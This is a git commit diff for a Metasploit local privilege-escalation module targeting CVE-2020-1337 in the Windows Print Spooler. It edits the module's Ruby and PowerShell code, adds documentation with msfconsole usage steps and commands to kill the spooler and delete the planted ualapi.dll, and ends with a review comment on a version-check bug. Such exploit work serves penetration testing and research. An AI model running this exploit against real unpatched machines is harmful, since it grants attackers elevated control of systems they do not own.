Cleanup and edits per review from Christophe
Removed an unused method from the PowerShell script, cleaned up some code in the module, and added removal instructions to the documentation.
This commit is contained in:
parent
7d81b4826d
commit
50e115b414
@ -74,31 +74,6 @@ $MethodDefinition = @"
|
|||
}
|
||||
return bSuccess;
|
||||
}
|
||||
public static bool SendFileToPrinter(string szPrinterName, string szFileName)
|
||||
{
|
||||
// Open the file.
|
||||
FileStream fs = new FileStream(szFileName, FileMode.Open);
|
||||
// Create a BinaryReader on the file.
|
||||
BinaryReader br = new BinaryReader(fs);
|
||||
// Dim an array of bytes big enough to hold the file's contents.
|
||||
Byte[] bytes = new Byte[fs.Length];
|
||||
bool bSuccess = false;
|
||||
// Your unmanaged pointer.
|
||||
IntPtr pUnmanagedBytes = new IntPtr(0);
|
||||
int nLength;
|
||||
nLength = Convert.ToInt32(fs.Length);
|
||||
// Read the contents of the file into the array.
|
||||
bytes = br.ReadBytes(nLength);
|
||||
// Allocate some unmanaged memory for those bytes.
|
||||
pUnmanagedBytes = Marshal.AllocCoTaskMem(nLength);
|
||||
// Copy the managed byte array into the unmanaged array.
|
||||
Marshal.Copy(bytes, 0, pUnmanagedBytes, nLength);
|
||||
// Send the unmanaged bytes to the printer.
|
||||
bSuccess = SendBytesToPrinter(szPrinterName, pUnmanagedBytes, nLength);
|
||||
// Free the unmanaged memory that you allocated earlier.
|
||||
Marshal.FreeCoTaskMem(pUnmanagedBytes);
|
||||
return bSuccess;
|
||||
}
|
||||
}
|
||||
}
|
||||
"@;
|
||||
|
|
|
@ -20,24 +20,31 @@ but the link will be in place when the print takes place, so the file
|
|||
write will pass through and end up in the trusted location.
|
||||
|
||||
When the printer is created, the target will show a pop-up saying a
|
||||
printer weas created.
|
||||
printer was created.
|
||||
A larger issue here is that the Spooler service does not like to stop.
|
||||
Trying `sc stop` Spooler does not stop the spooler.
|
||||
Killing the pid with a trusted process will kill it, but it restarts
|
||||
automatically.
|
||||
Using the `pendingFileRenameOperations` registry key also does not appear
|
||||
to work.
|
||||
To remove the dll, you can:
|
||||
`sc config spooler start= disabled`
|
||||
`taskkill /F /IM spoolsv.exe`
|
||||
`del ualapi.dll`
|
||||
`sc config spooler start= auto`
|
||||
`sc start spooler`
|
||||
|
||||
## Verification Steps
|
||||
|
||||
Start ```msfconsole```
|
||||
get session on a windows target that is not patched (and <= 2003)
|
||||
get session on a windows target that is not patched (and <= windows 10 version 2004)
|
||||
```use windows/local/cve_2020_1337_printerdemon```
|
||||
```set session <session>```
|
||||
```set payload <payload>```
|
||||
```set lhost <lhost>```
|
||||
```set lport <lport>```
|
||||
```run```
|
||||
|
||||
Reboot twice
|
||||
Verify you get a session
|
||||
|
||||
|
|
|
@ -15,6 +15,8 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
include Msf::Exploit::EXE
|
||||
include Msf::Post::Windows::Powershell
|
||||
|
||||
prepend Msf::Exploit::Remote::AutoCheck
|
||||
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
|
@ -92,7 +94,6 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
|
||||
# Run Exploit Script
|
||||
print_status("Running Exploit on #{sysinfo['Computer']}")
|
||||
vprint_status(script)
|
||||
begin
|
||||
#client.powershell.execute_string(code: script)
|
||||
session.powershell.execute_string({code: script})
|
||||
|
@ -138,7 +139,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
vprint_status("Rebooting #{sysinfo['Computer']}")
|
||||
reboot_command = 'shutdown /r'
|
||||
begin
|
||||
cmd_exec('cmd.exe', "/c #{reboot_command}")
|
||||
session.sys.power.reboot
|
||||
rescue Rex::TimeoutError => e
|
||||
elog('Caught timeout. Exploit may be taking longer or it may have failed.', error: e)
|
||||
print_error('Caught timeout. Exploit may be taking longer or it may have failed.')
|
||||
|
@ -168,20 +169,6 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
|
||||
vprint_status("Build Number = #{build_num}")
|
||||
return Exploit::CheckCode::Appears if sysinfo_value =~ /10/ && build_num <= 18363
|
||||
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def ensure_clean_destination(path)
|
||||
return unless file?(path)
|
||||
|
||||
print_status("#{path} already exists on the target. Deleting...")
|
||||
begin
|
||||
file_rm(path)
|
||||
print_status("Deleted #{path}")
|
||||
rescue Rex::Post::Meterpreter::RequestError => e
|
||||
elog(e)
|
||||
print_error("Unable to delete #{path}")
|
||||
end
|
||||
end
|
||||
end
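Review bot: With `Msf::Exploit::Remote::AutoCheck` now prepended, `check` runs before every exploit attempt, and the context line `build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i` raises NoMethodError on nil whenever the OS string does not fit that pattern, aborting the run instead of returning a CheckCode. The expression also reads `[0]` (the whole match) rather than the capture group, so it only yields the build number because `\w` happens to match digits — presumably the intent was the trailing build number, worth confirming against the actual `sysinfo['OS']` format. A guarded form keeps the current result while failing cleanly: `match = sysinfo_value.match(/\w+\d+\w+(\d+)/)`, `return Exploit::CheckCode::Unknown unless match`, `build_num = match[0].to_i`. Separately, in the reboot hunk the local `reboot_command = 'shutdown /r'` is left unused after the switch to `session.sys.power.reboot` and can be dropped. The enclosing `check` method starts outside this hunk.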
|
||||
|
|